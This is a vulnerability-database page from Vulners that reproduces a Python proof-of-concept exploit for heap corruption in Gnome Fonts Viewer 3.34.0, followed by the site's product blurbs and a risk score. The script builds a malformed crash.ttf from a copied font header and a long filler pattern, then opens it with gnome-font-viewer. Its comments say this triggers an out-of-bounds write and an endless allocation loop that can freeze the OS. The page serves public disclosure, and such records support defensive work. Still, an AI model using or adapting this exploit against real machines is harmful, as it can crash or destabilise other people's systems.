Vulners
Lucene search
Gnome Fonts Viewer 3.34.0 - Heap Corruption
#!/usr/bin/env python3
# Exploit Title: Gnome Fonts Viewer 3.34.0 Heap Corruption
# Date: 2020-09-10
# Exploit Author: Cody Winkler
# Vendor Homepage: gnome.org
# Software Link: https://help.gnome.org/misc/release-notes/3.6/users-font-viewer.html
# Version: 3.34.0
# Tested On: Ubuntu 20.04.1 LTS
#
# Note: May take a few tries. Too many consecutive runs can freeze OS.
# This will trigger an infinite malloc() loop until gnome-font-viewer process is stopped.
from os import system
this_pattern = "BEEF"*21125 # needs to be filled to len ~84500
# TTF file header (probably has some junk data in it) taken from MesloLGS
NF Regular.ttf
ttf_header = ("\x00\x01\x00\x00\x00\x13\x01\x00\x00\x04\x00\x30\x46\x46\x54"
"\x4d\x75\xfe\x73\xdd\x00\x13\xb6\x0c\x00\x00\x00\x1c\x47\x44\x45"
"\x46\x4d\x76\x5d\xda\x00\x13\xb0\xac\x00\x00\x04\xaa\x47\x50\x4f"
"\x53\x44\x76\x4c\x75\x00\x13\xb5\xec\x00\x00\x00\x20\x47\x53\x55"
"\x42\x09\xf6\x0b\xdc\x00\x13\xb5\x58\x00\x00\x00\x92\x4f\x53\x2f"
"\x32\x8d\xbd\x8e\x75\x00\x00\x01\xb8\x00\x00\x00\x60\x50\x66\x45"
"\x64\x5b\xd3\xe9\x6b\x00\x13\xb6\x28\x00\x00\x02\x50\x63\x6d\x61"
"\x70\xbf\x0d\x76\x7c\x00\x00\x34\x30\x00\x00\x0a\x36\x63\x76\x74"
"\x20\x28\xfd\x02\x16\x00\x00\x48\x98\x00\x00\x00\x38\x66\x70\x67"
"\x6d\x31\xfc\xa0\x95\x00\x00\x3e\x68\x00\x00\x09\x96\x67\x61\x73"
"\x70\xff\xff\x00\x10\x00\x13\xb0\xa4\x00\x00\x00\x08\x67\x6c\x79"
"\x66\xd6\x2f\x24\x7c\x00\x00\xac\xf0\x00\x11\xd8\x34\x68\x65\x61"
"\x64\x04\xe3\x81\x66\x00\x00\x01\x3c\x00\x00\x00\x36\x68\x68\x65"
"\x61\x0a\xf4\x01\xa2\x00\x00\x01\x74\x00\x00\x00\x24\x68\x6d\x74"
"\x78\x93\xdf\x7e\x92\x00\x00\x02\x18\x00\x00\x32\x16\x6c\x6f\x63"
"\x61\xe6\x44\x45\x24\x00\x00\x48\xd0\x00\x00\x64\x20\x6d\x61\x78"
"\x70\x1a\xa2\x0b\x9c\x00\x00\x01\x98\x00\x00\x00\x20\x6e\x61\x6d"
"\x65\x62\x13\x17\xa4\x00\x12\x85\x24\x00\x00\x0b\x9d\x70\x6f\x73"
"\x74\xbb\xe8\x29\xcf\x00\x12\x90\xc4\x00\x01\x1f\xdd\x70\x72\x65"
"\x70\xb4\xc5\xc5\x72\x00\x00\x48\x00\x00\x00\x00\x95\x00\x01\x00"
"\x00\x00\x02\x07\x2b\xd0\x81\xfc\x0f\x5f\x0f\x3c\xf5\x02\x9f\x08"
"\x00\x00\x00\x00\x00\xc5\x74\x19\x33\x00\x00\x00\x00\xda\x9d\x14"
"\xf1\xfd\x41\xfc\xfc\x05\xdf\x0a")
print('[+] Generating crash.ttf with DEADDEAD')
with open("./crash.ttf", 'w') as f:
f.write(ttf_header)
f.write(this_pattern)
f.close()
print('[+] Done')
print('[+] Triggering out-of-bounds write in gnome-font-viewer')
system("/usr/bin/gnome-font-viewer ./crash.ttf")Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Sep 2020 00:00Current
7.4High risk
Vulners AI Score7.4